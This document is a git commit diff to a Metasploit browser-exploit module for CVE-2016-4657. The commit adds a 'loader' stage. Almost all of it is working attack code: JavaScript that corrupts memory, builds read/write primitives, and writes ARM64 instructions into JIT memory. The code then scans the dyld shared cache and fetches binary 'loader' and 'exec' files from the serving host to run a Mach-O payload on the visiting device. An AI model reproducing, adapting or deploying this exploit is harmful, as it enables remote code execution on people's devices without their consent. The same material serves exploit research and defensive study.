add loader
This commit is contained in:
parent
cd1f4e1373
commit
d465226d89
|
@ -41,27 +41,57 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def on_request_uri(cli, request)
|
||||
print_status("Request from #{request['User-Agent']}")
|
||||
array_payload = Rex::Text.to_num(payload.raw)
|
||||
if request.uri =~ /\/loader$/
|
||||
print_good("Target is vulnerable.")
|
||||
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4657", "loader" )
|
||||
loader_data = File.read(local_file, {:mode => 'rb'})
|
||||
send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
|
||||
return
|
||||
elsif request.uri =~ /\/exec$/
|
||||
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4657", "exec" )
|
||||
loader_data = File.read(local_file, {:mode => 'rb'})
|
||||
send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
|
||||
print_status("Sent exec")
|
||||
return
|
||||
end
|
||||
#array_payload = Rex::Text.to_num(payload.raw)
|
||||
html = %Q^
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
var payload = new Uint8Array([#{array_payload}]);
|
||||
var payload32 = new Uint32Array(payload.buffer)
|
||||
function load_binary_resource(url) {
|
||||
var req = new XMLHttpRequest();
|
||||
req.open('GET', url, false);
|
||||
req.overrideMimeType('text\/plain; charset=x-user-defined');
|
||||
req.send(null);
|
||||
if (req.status != 200) {
|
||||
document.write("fail downloading loader");
|
||||
};
|
||||
return req.responseText;
|
||||
}
|
||||
var mem0 = 0;
|
||||
var mem1 = 0;
|
||||
var mem2 = 0;
|
||||
|
||||
function read4(addr) {
|
||||
mem0[4] = addr;
|
||||
var ret = mem2[0];
|
||||
mem0[4] = mem1;
|
||||
return ret;
|
||||
}
|
||||
|
||||
function write4(addr, val) {
|
||||
mem0[4] = addr;
|
||||
mem2[0] = val;
|
||||
mem0[4] = mem1;
|
||||
}
|
||||
filestream = load_binary_resource("exec")
|
||||
var shll = new Uint32Array(filestream.length / 4);
|
||||
for (var i = 0; i < filestream.length;) {
|
||||
var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
|
||||
shll[i / 4] = word;
|
||||
i += 4;
|
||||
}
|
||||
_dview = null;
|
||||
function u2d(low, hi) {
|
||||
if (!_dview) _dview = new DataView(new ArrayBuffer(16));
|
||||
|
@ -79,16 +109,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
pressure[i] = 0;
|
||||
}
|
||||
}
|
||||
|
||||
function swag() {
|
||||
if (bufs[0]) return;
|
||||
dgc();
|
||||
dgc();
|
||||
dgc();
|
||||
dgc();
|
||||
dgc();
|
||||
dgc();
|
||||
dgc();
|
||||
dgc();
|
||||
for (var i = 0; i < 4; i++) {
|
||||
dgc();
|
||||
}
|
||||
for (i = 0; i < bufs.length; i++) {
|
||||
bufs[i] = new Uint32Array(0x100 * 2)
|
||||
for (k = 0; k < bufs[i].length;) {
|
||||
|
@ -101,18 +127,67 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
for (var z = 0; z < 0x2000; z++) trycatch += "try{} catch(e){}; ";
|
||||
var fc = new Function(trycatch);
|
||||
var fcp = 0;
|
||||
var smsh = new Uint32Array(0x10);
|
||||
var smsh = new Uint32Array(0x10)
|
||||
|
||||
function smashed(stl) {
|
||||
document.body.innerHTML = "";
|
||||
var jitf = (smsh[(0x10 + smsh[(0x10 + smsh[(fcp + 0x18) / 4]) / 4]) / 4]);
|
||||
for(n=0; n<payload32.length; n++) {
|
||||
write4(jitf + n*4, payload32[n]);
|
||||
write4(jitf, 0xd28024d0); //movz x16, 0x126
|
||||
write4(jitf + 4, 0x58000060); //ldr x0, 0x100007ee4
|
||||
write4(jitf + 8, 0xd4001001); //svc 80
|
||||
write4(jitf + 12, 0xd65f03c0); //ret
|
||||
write4(jitf + 16, jitf + 0x20);
|
||||
write4(jitf + 20, 1);
|
||||
fc();
|
||||
var dyncache = read4(jitf + 0x20);
|
||||
var dyncachev = read4(jitf + 0x20);
|
||||
var go = 1;
|
||||
while (go) {
|
||||
if (read4(dyncache) == 0xfeedfacf) {
|
||||
for (i = 0; i < 0x1000 / 4; i++) {
|
||||
if (read4(dyncache + i * 4) == 0xd && read4(dyncache + i * 4 + 1 * 4) == 0x40 && read4(dyncache + i * 4 + 2 * 4) == 0x18 && read4(dyncache + i * 4 + 11 * 4) == 0x61707369) // lulziest mach-o parser ever
|
||||
{
|
||||
go = 0;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
dyncache += 0x1000;
|
||||
}
|
||||
dyncache -= 0x1000;
|
||||
var bss = [];
|
||||
var bss_size = [];
|
||||
for (i = 0; i < 0x1000 / 4; i++) {
|
||||
if (read4(dyncache + i * 4) == 0x73625f5f && read4(dyncache + i * 4 + 4) == 0x73) {
|
||||
bss.push(read4(dyncache + i * 4 + (0x20)) + dyncachev - 0x80000000);
|
||||
bss_size.push(read4(dyncache + i * 4 + (0x28)));
|
||||
}
|
||||
}
|
||||
var shc = jitf;
|
||||
var filestream = load_binary_resource("loader")
|
||||
for (var i = 0; i < filestream.length;) {
|
||||
var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
|
||||
write4(shc, word);
|
||||
shc += 4;
|
||||
i += 4;
|
||||
}
|
||||
jitf &= ~0x3FFF;
|
||||
jitf += 0x8000;
|
||||
write4(shc, jitf);
|
||||
write4(shc + 4, 1);
|
||||
// copy macho
|
||||
for (var i = 0; i < shll.length; i++) {
|
||||
write4(jitf + i * 4, shll[i]);
|
||||
}
|
||||
for (var i = 0; i < bss.length; i++) {
|
||||
for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) {
|
||||
write4(bss[i] + k * 4, 0);
|
||||
}
|
||||
}
|
||||
fc();
|
||||
alert(2);
|
||||
}
|
||||
function go() {
|
||||
dgc();
|
||||
setTimeout(go_, 400);
|
||||
}
|
||||
|
||||
function go_() {
|
||||
if (smsh.length != 0x10) {
|
||||
smashed();
|
||||
|
@ -131,18 +206,42 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
return 10;
|
||||
};
|
||||
var props = {
|
||||
p0: { value: 0 },
|
||||
p1: { value: 1 },
|
||||
p2: { value: 2 },
|
||||
p3: { value: 3 },
|
||||
p4: { value: 4 },
|
||||
p5: { value: 5 },
|
||||
p6: { value: 6 },
|
||||
p7: { value: 7 },
|
||||
p8: { value: 8 },
|
||||
length: { value: not_number },
|
||||
stale: { value: arr },
|
||||
after: { value: 666 }
|
||||
p0: {
|
||||
value: 0
|
||||
},
|
||||
p1: {
|
||||
value: 1
|
||||
},
|
||||
p2: {
|
||||
value: 2
|
||||
},
|
||||
p3: {
|
||||
value: 3
|
||||
},
|
||||
p4: {
|
||||
value: 4
|
||||
},
|
||||
p5: {
|
||||
value: 5
|
||||
},
|
||||
p6: {
|
||||
value: 6
|
||||
},
|
||||
p7: {
|
||||
value: 7
|
||||
},
|
||||
p8: {
|
||||
value: 8
|
||||
},
|
||||
length: {
|
||||
value: not_number
|
||||
},
|
||||
stale: {
|
||||
value: arr
|
||||
},
|
||||
after: {
|
||||
value: 666
|
||||
}
|
||||
};
|
||||
var target = [];
|
||||
var stale = 0;
|
||||
|
@ -150,14 +249,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
stale = target.stale;
|
||||
stale[0] += 0x101;
|
||||
stale[1] = {}
|
||||
for (z = 0; z < 0x1000; z++) fc();
|
||||
for (var z = 0; z < 0x1000; z++) fc();
|
||||
for (i = 0; i < bufs.length; i++) {
|
||||
for (k = 0; k < bufs[0].length; k++) {
|
||||
if (bufs[i][k] == 0x41414242) {
|
||||
stale[0] = fc;
|
||||
fcp = bufs[i][k];
|
||||
stale[0] = {
|
||||
'a': u2d(105, 0x1172600),
|
||||
'a': u2d(105, 0),
|
||||
'b': u2d(0, 0),
|
||||
'c': smsh,
|
||||
'd': u2d(0x100, 0)
|
||||
|
@ -179,14 +278,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
}
|
||||
}
|
||||
document.location.reload();
|
||||
setTimeout(function() {
|
||||
document.location.reload();
|
||||
}, 2000);
|
||||
}
|
||||
setTimeout(go, 100);
|
||||
|
||||
dgc();
|
||||
setTimeout(go_, 200);
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
^
|
||||
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue